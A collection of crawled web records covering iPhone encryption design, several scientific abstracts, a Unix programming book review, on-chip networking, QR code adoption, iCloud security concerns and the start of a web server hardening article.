Last week I wrote about Apple’s new default encryption policy for iOS 8. Since that piece was intended for general audiences I mostly avoided technical detail. But since some folks (and apparently the Washington Post!) are still wondering about the nitty-gritty details of Apple’s design, I thought it might be helpful to sum up what we know and noodle about what we don’t. To get started, it’s worth pointing out that disk encryption is hardly new with iOS 8. In fact, Apple’s operating system has enabled some form of encryption since before iOS 7. What’s happened in the latest update is that Apple has decided to protect much more of the interesting data on the device under the user’s passcode. This includes photos and text messages — things that were not previously passcode-protected, and which police very much want access to.* So to a large extent the ‘new’ feature Apple is touting in iOS 8 is simply that they’re encrypting more data. But it’s also worth pointing out that newer iOS devices — those with an “A7 or later A-series processor” — also add substantial hardware protections to thwart device cracking. In the rest of this post I’m going to talk about how these protections may work and how Apple can realistically claim not to possess a back door. One caveat: I should probably point out that Apple isn’t known for showing up at parties and bragging about their technology — so while a fair amount of this is based on published information provided by Apple, some of it is speculation. I’ll try to be clear where one ends and the other begins. Password-based encryption 101 Normal password-based file encryption systems take in a password from a user, then apply a key derivation function (KDF) that converts a password (and some salt) into an encryption key. This approach doesn’t require any specialized hardware, so it can be securely implemented purely in software provided that (1) the software is honest and well-written, and (2) the chosen password is strong, i.e., hard to guess. The problem here is that nobody ever chooses strong passwords. In fact, since most passwords are terrible, it’s usually possible for an attacker to break the encryption by working through a ‘dictionary‘ of likely passwords and testing to see if any decrypt the data. To make this really efficient, password crackers often use special-purpose hardware that takes advantage of parallelization (using FPGAs or GPUs) to massively speed up the process. Thus a common defense against cracking is to use a ‘slow’ key derivation function like PBKDF2 or scrypt. Each of these algorithms is designed to be deliberately resource-intensive, which does slow down normal login attempts — but hits crackers much harder. Unfortunately, modern cracking rigs can defeat these KDFs by simply throwing more hardware at the problem. There are some approaches to dealing with this — this is the approach of memory-hard KDFs like scrypt — but this is not the direction that Apple has gone. How Apple’s encryption works Apple doesn’t use scrypt. Their approach is to add a 256-bit device-unique secret key called a UID to the mix, and to store that key in hardware where it’s hard to extract from the phone. Apple claims that it does not record these keys nor can it access them. On recent devices (with A7 chips), this key and the mixing process are protected within a cryptographic co-processor called the Secure Enclave. The Apple Key Derivation function ‘tangles’ the password with the UID key by running both through PBKDF2-AES — with an iteration count tuned to require about 80ms on the device itself.** The result is the ‘passcode key’. That key is then used as an anchor to secure much of the data on the phone. Since only the device itself knows UID — and the UID can’t be removed from the Secure Enclave — this means all password cracking attempts have to run on the device itself. That rules out the use of FPGA or ASICs to crack passwords. Of course Apple could write a custom firmware that attempts to crack the keys on the device but even in the best case such cracking could be pretty time consuming, thanks to the 80ms PBKDF2 timing. (Apple pegs such cracking attempts at 5 1/2 years for a random 6-character password consisting of lowercase letters and numbers. PINs will obviously take much less time, sometimes as little as half an hour. Choose a good passphrase!) So one view of Apple’s process is that it depends on the user picking a strong password. A different view is that it also depends on the attacker’s inability to obtain the UID. Let’s explore this a bit more. Securing the Secure Enclave The Secure Enclave is designed to prevent exfiltration of the UID key. On earlier Apple devices this key lived in the application processor itself. Secure Enclave provides an extra level of protection that holds even if the software on the application processor is compromised — e.g., jailbroken. One worrying thing about this approach is that, according to Apple’s documentation, Apple controls the signing keys that sign the Secure Enclave firmware. So using these keys, they might be able to write a special “UID extracting” firmware update that would undo the protections described above, and potentially allow crackers to run their attacks on specialized hardware. Which leads to the following question? How does Apple avoid holding a backdoor signing key that allows them to extract the UID from the Secure Enclave? It seems to me that there are a few possible ways forward here. - No software can extract the UID. Apple’s documentation even claims that this is the case; that software can only see the output of encrypting something with UID, not the UID itself. The problem with this explanation is that it isn’t really clear that this guarantee covers malicious Secure Enclave firmware written and signed by Apple. Update 10/4: Comex and others (who have forgotten more about iPhone internals than I’ve ever known) confirm that #1 is the right answer. The UID appears to be connected to the AES circuitry by a dedicated path, so software can set it as a key, but never extract it. Moreover this appears to be the same for both the Secure Enclave and older pre-A7 chips. So ignore options 2-4 below. - Apple does have the ability to extract UIDs. But they don’t consider this a backdoor, even though access to the UID should dramatically decrease the time required to crack the password. In that case, your only defense is a strong password. - Apple doesn’t allow firmware updates to the Secure Enclave firmware period. This would be awkward and limiting, but it would let them keep their customer promise re: being unable to assist law enforcement in unlocking phones. - Apple has built a nuclear option. In other words, the Secure Enclave allows firmware updates — but before doing so, the Secure Enclave will first destroy intermediate keys. Firmware updates are still possible, but if/when a firmware update is requested, you lose access to all data currently on the device. All of these are valid answers. In general, it seems reasonable to hope that the answer is #1. But unfortunately this level of detail isn’t present in the Apple documentation, so for the moment we just have to cross our fingers. Addendum: how did Apple’s “old” backdoor work? One wrinkle in this story is that allegedly Apple has been helping law enforcement agencies unlock iPhones for a while. This is probably why so many folks are baffled by the new policy. If Apple could crack a phone last year, why can’t they do it today? But the most likely explanation for this policy is probably the simplest one: Apple was never really ‘cracking’ anything. Rather, they simply had a custom boot image that allowed them to bypass the ‘passcode lock’ screen on a phone. This would be purely a UI hack and it wouldn’t grant Apple access to any of the passcode-encrypted data on the device. However, since earlier versions of iOS didn’t encrypt all of the phone’s interesting data using the passcode, the unencrypted data would be accessible upon boot. No way to be sure this is the case, but it seems like the most likely explanation. * Previous versions of iOS also encrypted these records, but the encryption key was not derived from the user’s passcode. This meant that (provided one could bypass the actual passcode entry phase, something Apple probably does have the ability to do via a custom boot image), the device could decrypt this data without any need to crack a password. ** As David Schuetz notes in this excellent and detailed piece, on phones with Secure Enclave there is also a 5 second delay enforced by the co-processor. I didn’t (and still don’t) want to emphasize this, since I do think this delay is primarily enforced by Apple-controlled software and hence Apple can disable it if they want to. The PBKDF2 iteration count is much harder to override.
<urn:uuid:85a5a5a3-fd2a-4a8b-a60c-0b11e9428185>
CC-MAIN-2017-04
https://blog.cryptographyengineering.com/2014/10/04/why-cant-apple-decrypt-your-iphone/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280801.0/warc/CC-MAIN-20170116095120-00239-ip-10-171-10-70.ec2.internal.warc.gz
en
0.944584
1,973
2.546875
3
Lima H.C.A.V.,Brazilian Field Epidemiology Training Program | Porto E.A.S.,Brazilian Field Epidemiology Training Program | Marins J.R.P.,Secretariat of Health Surveillance | Alves R.M.,Foodborne and Waterborne Diseases Branch | And 7 more authors. Tropical Doctor | Year: 2010 Beriberi is caused by thiamine deficiency. Early 20th century epidemics in Japan were attributed to rice contaminated by citreoviridin mycotoxin. Our investigation of an outbreak of beriberi in Brazil showed an association of beriberi with the consumption of poor quality subsistence farming rice, although, unlike other investigators of this outbreak, we did not identify citreoviridin producing fungi in the implicated rice. Source Tort L.F.L.,Oswaldo Cruz Institute FIOCRUZ | Volotao E.d.M.,Oswaldo Cruz Institute FIOCRUZ | de Mendonca M.C.L.,Oswaldo Cruz Institute FIOCRUZ | da Silva M.F.M.,Oswaldo Cruz Institute FIOCRUZ | And 6 more authors. Journal of Clinical Virology | Year: 2010 Background: Group A rotavirus (RV-A) genotype PG9 has emerged as one of the leading causes of gastroenteritis in children worldwide and currently is recognized as one of the five most common genotypes detected in humans. High intragenotype diversity in G9 RV-A has been observed, and nowadays, based on the genetic variability of the VP7 gene, six different phylogenetic lineages and eleven sublineages were described. Objectives: To study the degree of genetic variation and evolution of Brazilian PG9 RV-A strains. Study design: Phylogenetic analysis of 19 PG9 RV-A strains isolated from 2004 to 2007 in five different Brazilian states was conducted using the NSP1, NSP3, NSP5, VP4 and VP7 genes. For the VP4 and VP7 genes, 3D protein structure predictions were generated to analyze the spatial distribution of amino acid substitutions observed in Brazilian strains. Results: Based on the phylogenetic analyses, all Brazilian strains clustered within lineage G9-III and P-3 for VP7 and VP4, respectively, and were classified as genotype A1, T1 and H1 for the NSP1, NSP3 and NSP5 genes, respectively. Interestingly, all the strains isolated in Acre State (Northern Brazil) formed a closely related cluster clearly separated from the other Brazilian and prototype strains with regard to the five genes studied. Unique amino acid substitutions were observed in Acre strains in comparison with the prototype and Brazilian strains. Conclusion: Inclusion of Acre strains in the phylogenetic analysis revealed the presence of a novel genetic variant and demonstrated a diversification of PG9 rotaviruses in Brazil. © 2010 Elsevier B.V. All rights reserved. Source
<urn:uuid:b8878f23-0379-4b92-8271-a8be562fd9fc>
CC-MAIN-2017-04
https://www.linknovate.com/affiliation/brazilian-field-epidemiology-training-program-2264869/all/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281492.97/warc/CC-MAIN-20170116095121-00055-ip-10-171-10-70.ec2.internal.warc.gz
en
0.901108
632
2.671875
3
Shin S.-K.,BK21PLUS Program in Embodiment | Kim J.,BK21PLUS Program in Embodiment | Ha S.-M.,Seoul National University | Oh H.-S.,Seoul National University | And 4 more authors. PLoS ONE | Year: 2015 Airborne microorganisms have significant effects on human health, and children are more vulnerable to pathogens and allergens than adults. However, little is known about the microbial communities in the air of childcare facilities. Here, we analyzed the bacterial and fungal communities in 50 air samples collected from five daycare centers and five elementary schools located in Seoul, Korea using culture-independent high-throughput pyrosequencing. The microbial communities contained a wide variety of taxa not previously identified in child daycare centers and schools. Moreover, the dominant species differed from those reported in previous studies using culture-dependent methods. The well-known fungi detected in previous culture-based studies (Alternaria, Aspergillus, Penicillium, and Cladosporium) represented less than 12% of the total sequence reads. The composition of the fungal and bacterial communities in the indoor air differed greatly with regard to the source of the microorganisms. The bacterial community in the indoor air appeared to contain diverse bacteria associated with both humans and the outside environment. In contrast, the fungal community was largely derived from the surrounding outdoor environment and not from human activity. The profile of the microorganisms in bioaerosols identified in this study provides the fundamental knowledge needed to develop public health policies regarding the monitoring and management of indoor air quality. © 2015 Shin et al. This is an open access article distributed under the terms of the Creative Commons Attribution License, which permits unrestricted use, distribution, and reproduction in any medium, provided the original author and source are credited. Source
<urn:uuid:0fc6d5e9-11bf-4146-a363-be5193d0f261>
CC-MAIN-2017-04
https://www.linknovate.com/affiliation/bk21plus-program-in-embodiment-2401111/all/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560285337.76/warc/CC-MAIN-20170116095125-00449-ip-10-171-10-70.ec2.internal.warc.gz
en
0.925173
380
2.75
3
Author: Eric S. Raymond Many books have been written about the UNIX operating system. Many of them are so-called cookbooks while others are packed with theoretical knowledge. This one is peculiar as it incorporates both types, packing the best material from each. About the author Eric S. Raymond has been a UNIX developer since 1982. Known as the resident anthropologist and rowing ambassador of the open source community, he wrote the movement’s manifesto in “The Cathedral and the Baazar” and is the editor of “The New Hacker’s Dictionary”. Inside the book The book begins with some basic facts about UNIX. Raymond presents not only a historical view but also explains why UNIX is so popular in many environments and determines its weak points. He examines the raise of UNIX from the beginning in 1969, the days when hardware was still weak in performance. He then follows the UNIX Wars and the dark time where UNIX was almost terminated and then reborn in new light as Linux and free UNIX. And here we find some simple but powerful rules about UNIX. Like the Pean axioms in mathematics we can use this rules as a good base for building a giant like UNIX or a UNIX like OS. The rules are well explained and the author complements them with various examples. These are the rules which teach us good logic in UNIX programming and UNIX thinking at all. As UNIX lovers say – “Keep it simple stupid” the well known KISS principle. The last chapter in the first part of the book covers a comparison between UNIX and other operating systems popular not only today but also in the past (VMS, MS Windows, BeOS, MacOS, OS/2, MVS,VM/CMS). Raymond illustrates some common but important things about these operating systems and then he examines them. What follows is a discussion on modularity in writing code. We always try to keep the code simple, make it modular, but that’s not easy as it sounds. Introduced here are terms like compactness, orthogonality and the SPOT rule (Single spot of Truth). There’s also a discussion on the top-down and vice versa method and the author also presents two case studies with real-life examples. As we move on you learn about protocols, text formats and other formats found in operating systems. Data file meta formats – DSV, MIME, cookies, XML and Windows INI formats are well explained here. There is an illustration of application protocol design through case studies (POP3, IMAP) and application protocol meta formats (IPP,CDDB/freedb.org). Transparency is important. Why? Simply because programming is complex enough and if your code is dirty, in a few weeks time you may not know what you were thinking when writing the code. Transparency is a passive quality. As always here you encounter many examples that explain very well in theory what you read. Communication between modules, well known words like IPC, pipes, redirections, sockets, shared memory, streams, RPC and threads are the basic idea behind the chapter entitled “Multiprogramming” which can also be called multiprocessing, just don’t confuse this term with the term used for the hardware implementation of two or more CPUs. Next Raymond dwells into the world of scripting utilities, or should I say mini languages as he writes about awk, sed, make, etc. He explains clearly when to use and when not to use these utilities. We all know that in most cases data is easier to follow then the process is logic. That’s explained in data driven programming with some real world examples. The authors continues by touching the issues surrounding configurability by introducing the reader to startup files, command line options as well as portability to different UNIX systems. Next you spend some time in user-interface sphere where you can read interesting case studies. Optimization is important but it’s not as simple as many programmers think. It’s a valuable asset if you are knowledgeable about hardware implementations and knowing the operational cost of the code you write. The second part of the book concludes with a discussion on complexity. You may ask yourself: “How can I write complex and simple programs?” It all depends on the situation and Raymond provides you with some intuitive guidelines. The third part of this title, entitled Implementation, comes with a presentation of programming languages. C, C++, Java, Pyton, Perl, Tcl and others are the main competitors. Every language has its advantages and disadvantages which are explained very well. I’m sure this chapter will help you decide on what language to use for a specific job. Another good lesson that the author provides is – reuse code. Do not reinvent code that has been developed a long time ago. This concept leads to open source licensing and the idea of reusing code. We know UNIX is a versatile operating system so no wonder Raymond provides some details about UNIX portability. There is a note about portability on other languages and standards in UNIX (BSD, AT&T, POSIX, Open Group, Open Source, etc.) Next comes the documentation. Without documentation UNIX or any other operating system would be just a black box, impossible to discover. Here you find descriptions on traditional utilities and formats, as well as recommendations for writing good documentation. Raymond continues with a summary of what open source means today. But wait, this is not an ode to the open source community but rather a cookbook with good recipes for the implementation of open source programs or code. There are also recommendations for choosing an open source licensing module. The closing chapter of the book contains thoughts on the future of UNIX. What is weakness of the UNIX philosophy? What can we do better? I’ll put the answer in simple mode – this is the Bible for people who regard UNIX as a religion or philosophy. This title is definitely not aimed at an beginner audience although those will less knowledge will benefit from keeping it on their bookshelf, they’ll just have to read it more than once to grasp all the presented material. I specially love the fact that the author was very clear and objective in his words during the entire book. I’ll quote one cookie: “UNIX is user friendly, it’s just choosy about who its friends are.”
<urn:uuid:cef7fcd3-3380-4771-853a-a95d8a8b46a3>
CC-MAIN-2017-04
https://www.helpnetsecurity.com/2004/07/14/the-art-of-unix-programming/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280133.2/warc/CC-MAIN-20170116095120-00267-ip-10-171-10-70.ec2.internal.warc.gz
en
0.936454
1,352
2.734375
3
Trickl T.,Karlsruhe Institute of Technology | Vogelmann H.,Karlsruhe Institute of Technology | Fix A.,German Aerospace Center | Schafler A.,German Aerospace Center | And 11 more authors. Atmospheric Chemistry and Physics | Year: 2016 A large-scale comparison of water-vapour vertical-sounding instruments took place over central Europe on 17 October 2008, during a rather homogeneous deep stratospheric intrusion event (LUAMI, Lindenberg Upper-Air Methods Intercomparison). The measurements were carried out at four observational sites: Payerne (Switzerland), Bilthoven (the Netherlands), Lindenberg (north-eastern Germany), and the Zugspitze mountain (Garmisch-Partenkichen, German Alps), and by an airborne water-vapour lidar system creating a transect of humidity profiles between all four stations. A high data quality was verified that strongly underlines the scientific findings. The intrusion layer was very dry with a minimum mixing ratios of 0 to 35 ppm on its lower west side, but did not drop below 120 ppm on the higher-lying east side (Lindenberg). The dryness hardens the findings of a preceding study ("Part 1", Trickl et al., 2014) that, e.g., 73% of deep intrusions reaching the German Alps and travelling 6 days or less exhibit minimum mixing ratios of 50 ppm and less. These low values reflect values found in the lowermost stratosphere and indicate very slow mixing with tropospheric air during the downward transport to the lower troposphere. The peak ozone values were around 70 ppb, confirming the idea that intrusion layers depart from the lowermost edge of the stratosphere. The data suggest an increase of ozone from the lower to the higher edge of the intrusion layer. This behaviour is also confirmed by stratospheric aerosol caught in the layer. Both observations are in agreement with the idea that sections of the vertical distributions of these constituents in the source region were transferred to central Europe without major change. LAGRANTO trajectory calculations demonstrated a rather shallow outflow from the stratosphere just above the dynamical tropopause, for the first time confirming the conclusions in "Part 1" from the Zugspitze CO observations. The trajectories qualitatively explain the temporal evolution of the intrusion layers above the four stations participating in the campaign. © 2016 Author(s). Source Brocard E.,Aerological Station | Jeannet P.,Aerological Station | Begert M.,Federal Office of Meteorology and Climatology MeteoSwiss | Levrat G.,Aerological Station | And 3 more authors. Journal of Geophysical Research: Atmospheres | Year: 2013 This study summarizes 53 years of radiosonde measurements at the MeteoSwiss Aerological Station of Payerne, Switzerland. The temperature time series is the result of a careful reassessment of the original data, mainly based on the internal station documentation. Comparisons with HadAT2 and RAOBCORE/RICH adjusted data sets document the high quality of our technical reevaluation. In the lower troposphere, we compare radiosonde measurement trends to independently homogenized surface trends measured at lowland and Alpine stations up to 3580 m. We find an average difference among trends below 0.03 K/decade (7-8%), showing consistency between upper air and surface temperature measurements. Upper air data show the 0°C isotherm to rise by about 70 m/decade on average over the whole period, which is consistent with the 60 m/decade trend found using surface measurements. A similar change has also been measured for the tropopause height, which rose by 54 m/decade over the last five decades. Analysis of the phase and amplitude of the diurnal temperature cycle shows a strongly decreasing amplitude with height from about 3 K at the surface to 0.2 K at 700 hPa. The diurnal cycle peaks at about 15 UTC at the surface and shifts to later hours with height, reaching almost midnight at 400 hPa. In the stratosphere, diurnal temperature again peaks at around 15 UTC, but with low amplitude. Annual temperature cycle amplitude is in the order of 15 K and fairly constant with height. The peak temperature, however, shifts from July-August in the troposphere to June-July in the stratosphere. Temperature trends in the troposphere exhibit a clear warming trend since the 1980s, which decreases with height and changes to a cooling trend in the stratosphere, with no trend or minor warming since the end of the 1990s. The warming in the troposphere is found to be larger during summer months, whereas the cooling in the stratosphere is larger during winter months. Key PointsSummary of 53 years of radiosonde measurements in Payerne, Switzerland ©2013. American Geophysical Union. All Rights Reserved. Source
<urn:uuid:14336252-4ce0-4a38-89ff-a31e655e68ba>
CC-MAIN-2017-04
https://www.linknovate.com/affiliation/aerological-station-1581651/all/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560283475.86/warc/CC-MAIN-20170116095123-00385-ip-10-171-10-70.ec2.internal.warc.gz
en
0.905031
1,012
2.703125
3
Microprocessor designers at MIT are working on ways to make PC microprocessors more powerful using a completely different approach than those that has been doubling the power of processors every 18 months for years. The approach – referred to as Internet on a chip or network on a chip – has been under development for years, but hasn't gone mainstream because simpler methods could deliver power boosts more efficiently. It is getting to the point that will no longer be possible, according to researchers at MIT. Processor designers have hit plateaus in both traditional methods of increasing the power of – increasing the width of the data bus so the chip can process larger chunks of data on each cycle, or making the cycles shorter and faster so it can process more chunks of data per minute. They've even plateaued a bit on the alternative method – adding more chips to each chip, in the form of multiple processor cores sharing the real estate, memory and other resources built onto the processor. Multicores finish demanding tasks by breaking them up into sections and dividing the sections among the available cores. They don't scale as efficiently as they could, however, because the data buses they use to communicate are also becoming overloaded. MIT researcher Li-Shiuan Peh wants to change that by making multicore chips work more like the server clusters that provide the massed power underneath most major resource-intensive applications on the Internet. The data bus on each chip, which allows the cores to exchange data, scale pretty well on chips with as many as eight cores, Peh said. Ten-core chips may use a second bus to keep performance high, but adding extra buses for each cluster of cores would become impractical quickly, long before being able to support hundreds of cores in one chipset – a scale Peh said is not as far away as most of us would think. The solution is to distribute the mechanism for data-transport in the same way multicores distribute the ability to process data. Each core would get a tiny data connection analogous to the Ethernet plug that goes into the back of each server in a cluster and divide data into packets so it can be transmitted and verified more effectively than the data streams used by PC data busses. To keep track of the packets, transmit and receive them correctly, each core would have a tiny router. Networking each core would "lay a grid over all the cores, so there are many possible paths between nodes," said Peh. "Latency is much lower, with the disparity increasing as you scale up the core counts," Peh told EETimes. "Bandwidth is also much much higher because there are many possible paths to spread traffic across." The network-on-a-chip design would save power because each core would only send data to the four cores nearest it, which would pass them on to other cores as needed. Data busses have to connect directly to each core – a long reach that requires a long wire and a lot of power to drive data through efficiently. Many researchers are working on network-on-a-chip designs, but none has made it work efficiently yet. In June Peh will present a paper summarizing 10 years of research on networked multicores at the Design Automation Conference. Among the big changes will be Peh's calculations showing all chipmakers will have to move to ring-networked interconnections or mesh network designs for processors with 16 processors or above. Peh and colleagues will also demonstrate a packet-switched Internet-on-a-chip design that uses 38 percent less energy than it would using a standard data bus. The chips, which are starting to be known as mini-internet chips, use two techniques impossible with data busses – low-swing signaling and "virtual bypassing." Virtual bypassing is a way to reduce the amount of time each router on the Internet holds a packet by having the router that was its last stop send a message ahead so the next router down the line will be able to change its settings so it doesn't have to hold and examine the packet before sending it on. Low-swing signaling, which reduces the amount of change in voltage necessary for each data packet created by each core. Read more of Kevin Fogarty's CoreIT blog and follow the latest IT news at ITworld. Follow Kevin on Twitter at @KevinFogarty. For the latest IT news, analysis and how-tos, follow ITworld on Twitter and Facebook.
<urn:uuid:5d3a6487-fa55-4579-b8f8-744d1bb6ee68>
CC-MAIN-2017-04
http://www.itworld.com/article/2729059/data-center/all-chips-with-16-cores-or-more-must-be--network-on-a-chip---mit-researcher.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279379.41/warc/CC-MAIN-20170116095119-00203-ip-10-171-10-70.ec2.internal.warc.gz
en
0.957288
920
3.359375
3
The most popular and comprehensive Open Source ECM platform The QR or ‘Quick Response‘ two-dimensional barcode is struggline for acceptance. QR was first invented by Toyota in 1994 to help track the steps of the automobile manufacturing process. Compared to standard barcodes, QR codes have the capacity to contain significantly more information. QR code readers are able to very quickly read and interpret the information encoded within the barcode. The encoded information can consist of numeric data, alphanumeric, binary or Japanese characters. QR codes are increasingly being used to encode information like the URL for a website or contact information for a person or company. Increasingly the URL from the QR code links to video advertising. They are often used for managing inventory and assets, airplane boarding passes, and tracking packages being shipped. QR codes are often read by special-purpose scanning devices or by smartphones equipped with an application that can read and interpret pictures taken by the camera built into phone. QR codes scanned are most frequently found in newspapers, magazines or on product packaging, and users typically scan the codes while at home or in stores. But despite the possibilities that the QR code offers, adoption of the technology has been slow. A study by ComScore made in the summer of 2011 found that from a population of 14 million users (of the total pool of 82 million US smartphone owners), only 6.2 percent had ever scanned a QR code using their mobile device. QR users tends to be males 18-34 with high incomes. Similarly, another survey by Simpson Carpenter found that only 36 percent of people know what QR codes are and only 11 percent have used them. In still another survey by ArchRival, it was found that 81 percent of students have smartphones, and of those, 75 percent said that they’d never scan a QR code and only 20 percent were actually able to successfully scan a QR code with their phone. Marketing Reasearch company Lab42 similarly found that only 13 percent of cell phone owners knew how to scan a QR code. And a survey of people on the street in San Francisco found only 11 percent of people could correctly identify what QR is. While some companies jumped on board the use of QR early on, others are stepping back because people just haven’t accepted the technology enough. But the use of QR codes is actually increasing. A survey on the frequency of use of QR codes in advertising byReadWrite found that despite the slow acceptance of QR, the use of QR in ads has nearly tripled over the last year. But Tom Desmet, Marketing Manager at Swiss-based Kooaba, said that “despite the enormous media attention QR is getting, it still is not at a level where people are really using it. It does not seem to fit into people’s daily routine.” An alternative to QR is now beginning to appear. It’s possible to embed the same level of information contained in a QR code into a image. And in a similar way to how QR codes are scanned, the encoded information in the image could be unlocked with the appropriate scanning application.
<urn:uuid:bc3c965c-6430-4277-9e0b-f73574f0cab6>
CC-MAIN-2017-04
http://formtek.com/blog/qr-barcodes-a-neat-idea-that-hasnt-really-caught-on/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280668.34/warc/CC-MAIN-20170116095120-00441-ip-10-171-10-70.ec2.internal.warc.gz
en
0.955729
629
3.078125
3
Article by Matthias Luft Recently (on 10/12/2011) Apple launched its new cloud offering which is called — who would have guessed — iCloud. Since we’re performing quite some research in the area of cloud security, we had a first look at the basic functionality and concepts of the iCloud. Its main features include the possibility to store full backups of Apple devices (at least, an iPhone, iPad or iPod touch running iOS 5 or a Mac running OS X Lion 10.7.2 is required), photos, music, or documents online. The data to be stored online is initially pushed to the cloud storage and then synchronized to any device which is using the same iCloud account. From this moment on, all changes on the cloudified data is immediately synchronized to the iCloud and then pushed to all participating devices. At this point, most infosec people might start to be worried a little bit: The common cloud concept of centralized data storage on premise of a third party does not cope well with the usual control focused approach of most technical infosec guys. - Lock In: According to the way the cloud functionality is integrated into iOS and OS X , usage of the iCloud might result in strong lock in effects. There is neither the possibility to use different backend cloud storage for the functionality nor the possibility to develop a product which provides similar functionality (see later paragraphs for examples). - Isolation Failure: is probably the most present threat for many IT people, since it is highly related to technical implementation details. It includes, but is not limited to, breakout attacks from guest systems due to vulnerabilities in the hypervisor or to unauthorised data access due to insufficient permission models in backend storage. Thinking of the trust factor consistency, Apple’s history of cloud based services was not their “finest hour” (as Steve Jobs stated during his keynote on iCloud). Remembering this talk and the awkward MobileMe vulnerabilities, we would agree with that. - Loss of Governance: The loss of governance over data in the cloud is kind of an intrinsic risk to cloud computing (also refer to the proposed system operation life cycle and the motivation given here). Again, referring to explanations about the technical iCloud implementation in the later paragraphs, this loss might be even more relevant in the iCloud environment. There are some more risks according to the ENISA study, but those are beyond the scope of this post. If we do such rough assessments as sample exercises during our cloud security workshops, the participants usually ask what “they can do”. Possible controls can be divided into two groups: controls to reduce the risk to a reasonable level and controls which prohibit the usage of the particular service. When analyzing the cloud, the control always mentioned first is crypto. Speaking of cloud storage, crypto is a valid control to ensure that unauthorized access (e.g. due to isolation failure/physical access/subpoena) to data has no relevant impact. The only requirement is that the encryption is performed on client side (depending on the attacker model and whether you trust your cloud service provider). For example, Amazon provides a feature which is called Server Side Encryption which encrypts any file that is stored within S3. Additionally, Amazon allows the implementation of a custom encryption client which enables customers to perform transparent encryption of all files which are stored in S3. The analysis of the security benefits, attacker models, and operational feasibility of these controls will be the subject of yet-another blogpost, but at least Amazon offers these encryption features. The offered services of the iCloud differ a little bit in functionality (for example, the iCloud iTunes version is a kind-of music streaming platform), but basically there are two API functions which allow access to the iCloud backend. First, it is possible to store documents (where documents can be complete directory structures) in the iCloud, second, a so called key-value store can be accessed. The access is encapsulated in dedicated API calls which take care of the complete data transfer, synchronization, and pushing operations using an iCloud daemon. So any use of the iCloud is strictly connected to an app (I would have called it application) which has to use the introduced iCloud API calls. Even though I’m not that familiar with the iOS/OS X architecture, I would have guessed that it would have been easily possible to add client side encryption using the internal keychain and usual cryptographic mechanisms. Still, this is not the fact and it is questionable, regarding the user experience oriented focus of Apple, whether this feature will be implemented in the future. This lack of encryption possibility brings up the second class of controls, which shall restrict the iCloud usage. This is especially important in corporate context, where full backups of devices would potentially expose sensitive corporate data to third parties. Even though the usage might be restricted by acceptable use policies, this might not enough since the activation of this feature can happen accidentally: If a user logs in once into the iCloud frontend, which is possible using a regular apple ID, the data synchronization is enabled by default and starts immediately (refer also to the quoted terms of service above). Since most corporate environments use MDM solutions, it is possible to restrict the iCloud usage at least for iOS based devices. The corresponding configuration profiles offer several options to disable the functionality: For today, this little introduction to iCloud and some of its security and trust aspects will be finished here. We will, however, continue to explore the attributes of iCloud more deeply in the near future (and we might even have a talk on it at Troopers. So stay tuned… Matthias Cross-posted from Insinuator
<urn:uuid:86b759b7-6fff-476d-b096-350a4480d9bf>
CC-MAIN-2017-04
http://www.infosecisland.com/blogview/17802-To-iTrust-or-Not.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280668.34/warc/CC-MAIN-20170116095120-00441-ip-10-171-10-70.ec2.internal.warc.gz
en
0.937314
1,157
2.546875
3
Learn Best Practices for Web Server Security In this, the first of two articles, we will talk about securing the overall hosting environment, PHP (surprise), and file system permissions. Many people will try to sell you an "application firewall" or similar devices, but I tend to believe that's too reactive, and not enough of a proactive approach to security. Every little bit helps in security, but adding layers without addressing the underlying problem is asking for trouble. The Environment We Must Live With In the world of Unix, especially Linux, we must hold to some truths. There are specific file system permissions required for certain things to happen, we must allow some level of access to users' scripts and PHP applications, and we cannot lock things down as tightly as we'd like. I can create and thoroughly secure a Web server hosting static content, but how useful is that? The most secure Linux box is disconnected from the network, but again, it is not very useful. Somewhere, in between multiple extremes, there is a workable medium. We aren't talking about a happy medium, notice. There is no happy medium in security. Keeping any platform secure is an iterative process, which involves multiple layers of security and constant maintenance. Many companies, at least a few I've seen recently, have widely varying ideas about how to configure permissions for Web hosting users. The two basic schools of thought are: give every user their own group and a umask of 002, or require that the user maintain their own permissions, with a 022 umask. In the first scenario, the benefit is that when collaborating, users never need to mess with permissions. Their umask will cause files to be written with group writable permissions, which is OK, because context matters. If they are writing files to a shared group resource, the parent directory will have the setgid bit set, and all files will be created with the same group id. Likewise, if they are in their own space, files will be written with the user's own group id. There are no obvious security holes here, but two issues quickly come to mind. First, this is training the user of the system to not pay attention to permissions at all. Second, certain security settings and third-party modules will not operate if files are group-writable, because the potential exists for malicious code to be introduced. If a single user's account in a group is compromised, the shared storage is as well. The second scenario doesn't train users to ignore permissions, and allows modules like su_exec to run without hacking the source and commenting out the code that checks for group-writable files. In the end, the biggest concern regardless of the strategy to deal with collaboration among users, is that users will continue creating world-writable directories. Many Web applications, even popular ones, tell the user to 'chmod 777' as part of the install process. That's fine, but they never tell them to fix the permissions after the installation process! Increasingly, especially in the .edu world, I've seen more and more malicious scripts actively looking for world-writable directories. A compromise of a single site on a server often leads to many sites having unauthorized content written to them. Of course, we cannot talk about Web security without mentioning PHP, the bane of Web hosting. PHP scripts are generally interpreted via the mod_php Apache module. This means that PHP scripts written by a user will run as the Web server user. This standard configuration causes many issues with file permissions. What if a Web developer wants to connect to a database? They must provide a password, and the file containing the password must be readable by the Web server. Since the Web server runs all scripts as the same user (it's running PHP itself), all users on the system can access this information via their own PHP scripts. There must be a better way. And indeed, if you're running mod_suexec, you can execute CGI programs as the user that owns them. Apache will run a program as root, which detects what user it should switch to based on the owner, and then runs the CGI as that user. PHP on the other hand, cannot be done this way, unless you're running Apache as root (don't). The workaround, since suphp doesn't really work, is to run all PHP applications as a CGI program. There's quite a performance hit, but the benefits provided by running PHP applications as the user that owns then far outweigh the performance concerns—buy more servers and be done with it. With user-run PHP scripts, you can easily identify which user's application is at fault when someone has executed a script that spams or launches a DoS attack. This is one step closer to managing the problem, but we're still not doing anything about the initial attack vector. Two problems exist: insecure PHP settings, and insecure applications. The entire next article will be devoted to insecure applications. PHP settings are tricky. Most downloadable applications, 